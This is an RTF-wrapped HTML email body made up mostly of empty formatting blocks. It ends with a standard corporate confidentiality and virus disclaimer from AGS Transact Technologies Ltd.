{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag96 <div>}\htmlrtf {\htmlrtf0 {\*\htmltag64}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span style="BACKGROUND-COLOR: rgb(255,255,255); FONT-FAMILY: verdana,sans-serif; COLOR: rgb(69,69,69); FONT-SIZE: 15px">}\htmlrtf {\htmlrtf0 
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag84 &nbsp;}\htmlrtf \'a0\htmlrtf0 {\*\htmltag72}\htmlrtf\par}\htmlrtf0

{\*\htmltag104 </div>}\htmlrtf }\htmlrtf0 
{\*\htmltag58 </body>}
{\*\htmltag27 </html>}
{\*\htmltag58 </body>}
{\*\htmltag27 </html>}
{\*\htmltag3 \par }
{\*\htmltag243 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">}
{\*\htmltag3 \par }
{\*\htmltag19 <html xmlns="http://www.w3.org/1999/xhtml">}
{\*\htmltag2 \par }
{\*\htmltag34 <head>}
{\*\htmltag1 \par }
{\*\htmltag1 \par }
{\*\htmltag177 <title>}
{\*\htmltag241 Untitled Document}
{\*\htmltag185 </title>}
{\*\htmltag1 \par }
{\*\htmltag241 <style type="text/css">}
{\*\htmltag241 \par <!--\par .style2 \{\par     font-size: 9px;\par     font-family: Arial, Helvetica, sans-serif;\par     color: #0000FF;\par \}\par -->\par }
{\*\htmltag249 </style>}
{\*\htmltag1 \par }
{\*\htmltag41 </head>}
{\*\htmltag2 \par }
{\*\htmltag2 \par }
{\*\htmltag50 <body>}
{\*\htmltag0 \par }
{\*\htmltag96 <table width="100%" border="1" cellpadding="0" cellspacing="0" bordercolor="#666666">}\htmlrtf {\pard\plain \f0\fs24 \htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag240   }
{\*\htmltag64 <tr>}\htmlrtf {\htmlrtf0 
{\*\htmltag4 \par }
{\*\htmltag84     }
{\*\htmltag148 <td>}\htmlrtf {\htmlrtf0 
{\*\htmltag84 <span class="style2">}\htmlrtf {\htmlrtf0 Disclaimer: This email and any files transmitted with
{\*\htmltag84    }\htmlrtf  \htmlrtf0 it are confidential and intended solely for the use of the individual
{\*\htmltag84    }\htmlrtf  \htmlrtf0 or entity to whom they are addressed. If you are not the intended
{\*\htmltag84    }\htmlrtf  \htmlrtf0 recipient, you are hereby notified that any distribution, copying,
{\*\htmltag84    }\htmlrtf  \htmlrtf0 review, re transmission, dissemination or other use of this email or the
{\*\htmltag84    }\htmlrtf  \htmlrtf0 information contained in it is strictly prohibited. Please note that
{\*\htmltag84    }\htmlrtf  \htmlrtf0 any views or opinions presented in this email are solely those of the
{\*\htmltag84    }\htmlrtf  \htmlrtf0 author and do not necessarily represent those of the company. Finally
{\*\htmltag84    }\htmlrtf  \htmlrtf0 the recipient should check this email and any attachments for the
{\*\htmltag84    }\htmlrtf  \htmlrtf0 presence of viruses. AGS Transact Technologies Ltd. accepts no liability
{\*\htmltag84    }\htmlrtf  \htmlrtf0 for any damage caused by any virus transmitted by this email.
{\*\htmltag92 </span>}\htmlrtf }\htmlrtf0 
{\*\htmltag156 </td>}\htmlrtf }\tab \htmlrtf0 
{\*\htmltag4 \par }\htmlrtf  \htmlrtf0 
{\*\htmltag84   }\htmlrtf\par}\htmlrtf0

{\*\htmltag72 </tr>}
{\*\htmltag0 \par }
{\*\htmltag104 </table>}\htmlrtf }\htmlrtf0 
{\*\htmltag0 \par }
{\*\htmltag58 </body>}
{\*\htmltag2 \par }
{\*\htmltag27 </html>}
{\*\htmltag3 \par }}

?a08fŠb6pc